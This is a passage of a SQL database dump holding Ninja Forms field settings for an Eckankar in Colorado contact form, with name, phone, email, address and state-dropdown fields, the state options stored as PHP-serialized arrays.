Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>'),(9438,181,'drawerDisabled','','drawerDisabled',''),(968,29,'key','html_201','key','html_201'),(969,29,'parent_id','4','parent_id','4'),(970,30,'type','textbox','type','textbox'),(971,30,'order','2','order','2'),(972,30,'fav_id','','fav_id',''),(973,30,'def_id','6','def_id','6'),(974,30,'label','First Name','label','First Name'),(975,30,'label_pos','above','label_pos','above'),(976,30,'mask','','mask',''),(977,30,'datepicker','0','datepicker','0'),(978,30,'first_name','1','first_name','1'),(979,30,'last_name','0','last_name','0'),(980,30,'from_name','0','from_name','0'),(981,30,'user_info_field_group','1','user_info_field_group','1'),(982,30,'show_help','0','show_help','0'),(983,30,'help_text','','help_text',''),(984,30,'calc_auto_include','0','calc_auto_include','0'),(985,30,'calc_option','0','calc_option','0'),(986,30,'placeholder','','placeholder',''),(987,30,'user_address_1','','user_address_1',''),(988,30,'user_address_2','','user_address_2',''),(989,30,'user_city','','user_city',''),(990,30,'user_zip','','user_zip',''),(991,30,'user_phone','','user_phone',''),(992,30,'user_email','','user_email',''),(993,30,'disable_input','0','disable_input','0'),(994,30,'input_limit','','input_limit',''),(995,30,'input_limit_type','char','input_limit_type','char'),(996,30,'input_limit_msg','','input_limit_msg',''),(997,30,'user_state','0','user_state','0'),(998,30,'autocomplete_off','0','autocomplete_off','0'),(999,30,'num_sort','0','num_sort','0'),(1000,30,'admin_label','','admin_label',''),(1001,30,'user_info_field_group_name','','user_info_field_group_name',''),(1002,30,'user_info_field_group_custom','','user_info_field_group_custom',''),(1003,30,'show_desc','0','show_desc','0'),(1004,30,'desc_pos','none','desc_pos','none'),(1005,30,'desc_text','','desc_text',''),(1006,30,'element_class','','element_class',''),(1007,30,'required','1','required','1'),(1008,30,'key','textbox_202','key','textbox_202'),(1009,30,'parent_id','4','parent_id','4'),(1010,31,'type','lastname','type','lastname'),(1011,31,'order','3','order','3'),(1012,31,'fav_id','','fav_id',''),(1013,31,'def_id','7','def_id','7'),(1014,31,'label','Last Name','label','Last Name'),(1015,31,'label_pos','above','label_pos','above'),(1016,31,'mask','','mask',''),(1017,31,'datepicker','0','datepicker','0'),(1018,31,'first_name','0','first_name','0'),(1019,31,'from_name','0','from_name','0'),(1020,31,'user_info_field_group','1','user_info_field_group','1'),(1021,31,'show_help','0','show_help','0'),(1022,31,'help_text','','help_text',''),(1023,31,'calc_auto_include','0','calc_auto_include','0'),(1024,31,'calc_option','0','calc_option','0'),(1025,31,'placeholder','','placeholder',''),(1026,31,'user_address_1','','user_address_1',''),(1027,31,'user_address_2','','user_address_2',''),(1028,31,'user_city','','user_city',''),(1029,31,'user_zip','','user_zip',''),(1030,31,'user_phone','','user_phone',''),(1031,31,'user_email','','user_email',''),(1032,31,'disable_input','0','disable_input','0'),(1033,31,'input_limit','','input_limit',''),(1034,31,'input_limit_type','char','input_limit_type','char'),(1035,31,'input_limit_msg','','input_limit_msg',''),(1036,31,'user_state','0','user_state','0'),(1037,31,'autocomplete_off','0','autocomplete_off','0'),(1038,31,'num_sort','0','num_sort','0'),(1039,31,'admin_label','','admin_label',''),(1040,31,'user_info_field_group_name','','user_info_field_group_name',''),(1041,31,'user_info_field_group_custom','','user_info_field_group_custom',''),(1042,31,'show_desc','0','show_desc','0'),(1043,31,'desc_pos','none','desc_pos','none'),(1044,31,'desc_text','','desc_text',''),(1045,31,'element_class','','element_class',''),(1046,31,'required','1','required','1'),(1047,31,'key','lastname_203','key','lastname_203'),(1048,31,'parent_id','4','parent_id','4'),(1049,32,'type','phone','type','phone'),(1050,32,'order','4','order','4'),(1051,32,'fav_id','','fav_id',''),(1052,32,'def_id','15','def_id','15'),(1053,32,'label','Phone','label','Phone'),(1054,32,'label_pos','above','label_pos','above'),(1055,32,'mask','(999) 999-9999','mask','(999) 999-9999'),(1056,32,'datepicker','0','datepicker','0'),(1057,32,'first_name','0','first_name','0'),(1058,32,'last_name','0','last_name','0'),(1059,32,'from_name','0','from_name','0'),(1060,32,'user_address_1','0','user_address_1','0'),(1061,32,'user_address_2','0','user_address_2','0'),(1062,32,'user_city','0','user_city','0'),(1063,32,'user_zip','0','user_zip','0'),(1064,32,'user_email','0','user_email','0'),(1065,32,'user_info_field_group','1','user_info_field_group','1'),(1066,32,'show_help','0','show_help','0'),(1067,32,'help_text','','help_text',''),(1068,32,'calc_auto_include','0','calc_auto_include','0'),(1069,32,'calc_option','0','calc_option','0'),(1070,32,'placeholder','','placeholder',''),(1071,32,'disable_input','0','disable_input','0'),(1072,32,'input_limit','','input_limit',''),(1073,32,'input_limit_type','char','input_limit_type','char'),(1074,32,'input_limit_msg','','input_limit_msg',''),(1075,32,'user_state','0','user_state','0'),(1076,32,'autocomplete_off','0','autocomplete_off','0'),(1077,32,'num_sort','0','num_sort','0'),(1078,32,'admin_label','','admin_label',''),(1079,32,'user_info_field_group_name','','user_info_field_group_name',''),(1080,32,'user_info_field_group_custom','','user_info_field_group_custom',''),(1081,32,'show_desc','0','show_desc','0'),(1082,32,'desc_pos','none','desc_pos','none'),(1083,32,'desc_text','','desc_text',''),(1084,32,'element_class','','element_class',''),(1085,32,'required','0','required','0'),(1086,32,'key','phone_205','key','phone_205'),(1087,32,'parent_id','4','parent_id','4'),(1088,33,'type','email','type','email'),(1089,33,'order','5','order','5'),(1090,33,'fav_id','','fav_id',''),(1091,33,'def_id','14','def_id','14'),(1092,33,'label','Email    (please fill in if adding or updating email)','label','Email    (please fill in if adding or updating email)'),(1093,33,'label_pos','above','label_pos','above'),(1094,33,'mask','','mask',''),(1095,33,'datepicker','0','datepicker','0'),(1096,33,'first_name','0','first_name','0'),(1097,33,'last_name','0','last_name','0'),(1098,33,'from_name','0','from_name','0'),(1099,33,'user_address_1','0','user_address_1','0'),(1100,33,'user_address_2','0','user_address_2','0'),(1101,33,'user_city','0','user_city','0'),(1102,33,'user_zip','0','user_zip','0'),(1103,33,'user_phone','0','user_phone','0'),(1104,33,'user_info_field_group','1','user_info_field_group','1'),(1105,33,'show_help','0','show_help','0'),(1106,33,'help_text','','help_text',''),(1107,33,'calc_auto_include','0','calc_auto_include','0'),(1108,33,'calc_option','0','calc_option','0'),(1109,33,'placeholder','','placeholder',''),(1110,33,'disable_input','0','disable_input','0'),(1111,33,'input_limit','','input_limit',''),(1112,33,'input_limit_type','char','input_limit_type','char'),(1113,33,'input_limit_msg','','input_limit_msg',''),(1114,33,'user_state','0','user_state','0'),(1115,33,'autocomplete_off','0','autocomplete_off','0'),(1116,33,'num_sort','0','num_sort','0'),(1117,33,'admin_label','','admin_label',''),(1118,33,'user_info_field_group_name','','user_info_field_group_name',''),(1119,33,'user_info_field_group_custom','','user_info_field_group_custom',''),(1120,33,'show_desc','0','show_desc','0'),(1121,33,'desc_pos','none','desc_pos','none'),(1122,33,'desc_text','','desc_text',''),(1123,33,'element_class','','element_class',''),(1124,33,'required','0','required','0'),(1125,33,'key','email_204','key','email_204'),(1126,33,'parent_id','4','parent_id','4'),(1127,34,'type','address','type','address'),(1128,34,'order','6','order','6'),(1129,34,'fav_id','','fav_id',''),(1130,34,'def_id','8','def_id','8'),(1131,34,'label','Street Address (add or update mailing address)','label','Street Address (add or update mailing address)'),(1132,34,'label_pos','above','label_pos','above'),(1133,34,'mask','','mask',''),(1134,34,'datepicker','0','datepicker','0'),(1135,34,'send_email','0','send_email','0'),(1136,34,'from_email','0','from_email','0'),(1137,34,'first_name','0','first_name','0'),(1138,34,'last_name','0','last_name','0'),(1139,34,'from_name','0','from_name','0'),(1140,34,'user_address_2','0','user_address_2','0'),(1141,34,'user_city','0','user_city','0'),(1142,34,'user_zip','0','user_zip','0'),(1143,34,'user_info_field_group','1','user_info_field_group','1'),(1144,34,'show_help','0','show_help','0'),(1145,34,'help_text','','help_text',''),(1146,34,'calc_auto_include','0','calc_auto_include','0'),(1147,34,'calc_option','0','calc_option','0'),(1148,34,'placeholder','','placeholder',''),(1149,34,'user_phone','','user_phone',''),(1150,34,'user_email','','user_email',''),(1151,34,'disable_input','0','disable_input','0'),(1152,34,'input_limit','','input_limit',''),(1153,34,'input_limit_type','char','input_limit_type','char'),(1154,34,'input_limit_msg','','input_limit_msg',''),(1155,34,'user_state','0','user_state','0'),(1156,34,'autocomplete_off','0','autocomplete_off','0'),(1157,34,'num_sort','0','num_sort','0'),(1158,34,'admin_label','','admin_label',''),(1159,34,'user_info_field_group_name','','user_info_field_group_name',''),(1160,34,'user_info_field_group_custom','','user_info_field_group_custom',''),(1161,34,'show_desc','0','show_desc','0'),(1162,34,'desc_pos','none','desc_pos','none'),(1163,34,'desc_text','','desc_text',''),(1164,34,'element_class','','element_class',''),(1165,34,'required','0','required','0'),(1166,34,'key','street_address_add_or_update_mailing_address_1616603898544','key','street_address_add_or_update_mailing_address_1616603898544'),(1167,34,'parent_id','4','parent_id','4'),(1168,35,'type','city','type','city'),(1169,35,'order','7','order','7'),(1170,35,'fav_id','','fav_id',''),(1171,35,'def_id','10','def_id','10'),(1172,35,'label','City','label','City'),(1173,35,'label_pos','above','label_pos','above'),(1174,35,'mask','','mask',''),(1175,35,'datepicker','0','datepicker','0'),(1176,35,'send_email','0','send_email','0'),(1177,35,'from_email','0','from_email','0'),(1178,35,'first_name','0','first_name','0'),(1179,35,'last_name','0','last_name','0'),(1180,35,'from_name','0','from_name','0'),(1181,35,'user_address_1','0','user_address_1','0'),(1182,35,'user_address_2','0','user_address_2','0'),(1183,35,'user_zip','0','user_zip','0'),(1184,35,'user_info_field_group','1','user_info_field_group','1'),(1185,35,'show_help','0','show_help','0'),(1186,35,'help_text','','help_text',''),(1187,35,'calc_auto_include','0','calc_auto_include','0'),(1188,35,'calc_option','0','calc_option','0'),(1189,35,'placeholder','','placeholder',''),(1190,35,'user_phone','','user_phone',''),(1191,35,'user_email','','user_email',''),(1192,35,'disable_input','0','disable_input','0'),(1193,35,'input_limit','','input_limit',''),(1194,35,'input_limit_type','char','input_limit_type','char'),(1195,35,'input_limit_msg','','input_limit_msg',''),(1196,35,'user_state','0','user_state','0'),(1197,35,'autocomplete_off','0','autocomplete_off','0'),(1198,35,'num_sort','0','num_sort','0'),(1199,35,'admin_label','','admin_label',''),(1200,35,'user_info_field_group_name','','user_info_field_group_name',''),(1201,35,'user_info_field_group_custom','','user_info_field_group_custom',''),(1202,35,'show_desc','0','show_desc','0'),(1203,35,'desc_pos','none','desc_pos','none'),(1204,35,'desc_text','','desc_text',''),(1205,35,'element_class','','element_class',''),(1206,35,'required','0','required','0'),(1207,35,'key','city_216','key','city_216'),(1208,35,'parent_id','4','parent_id','4'),(1209,36,'type','listselect','type','listselect'),(1210,36,'order','8','order','8'),(1211,36,'fav_id','','fav_id',''),(1212,36,'def_id','11','def_id','11'),(1213,36,'label','State','label','State'),(1214,36,'label_pos','above','label_pos','above'),(1215,36,'multi_size','5','multi_size','5'),(1216,36,'list_show_value','1','list_show_value','1'),(1217,36,'list','a:0:{}','list','a:0:{}'),(1218,36,'list_type','dropdown','list_type','dropdown'),(1219,36,'user_state','1','user_state','1'),(1220,36,'user_info_field_group','1','user_info_field_group','1'),(1221,36,'populate_term','','populate_term',''),(1222,36,'show_help','0','show_help','0'),(1223,36,'help_text','','help_text',''),(1224,36,'calc_auto_include','0','calc_auto_include','0'),(1225,36,'calc_option','0','calc_option','0'),(1226,36,'num_sort','0','num_sort','0'),(1227,36,'admin_label','','admin_label',''),(1228,36,'user_info_field_group_name','','user_info_field_group_name',''),(1229,36,'user_info_field_group_custom','','user_info_field_group_custom',''),(1230,36,'show_desc','0','show_desc','0'),(1231,36,'desc_pos','none','desc_pos','none'),(1232,36,'desc_text','','desc_text',''),(1233,36,'element_class','','element_class',''),(1234,36,'required','0','required','0'),(1235,36,'options','a:52:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:24:\"Please Choose Your State\";s:5:\"value\";s:24:\"Please Choose Your State\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 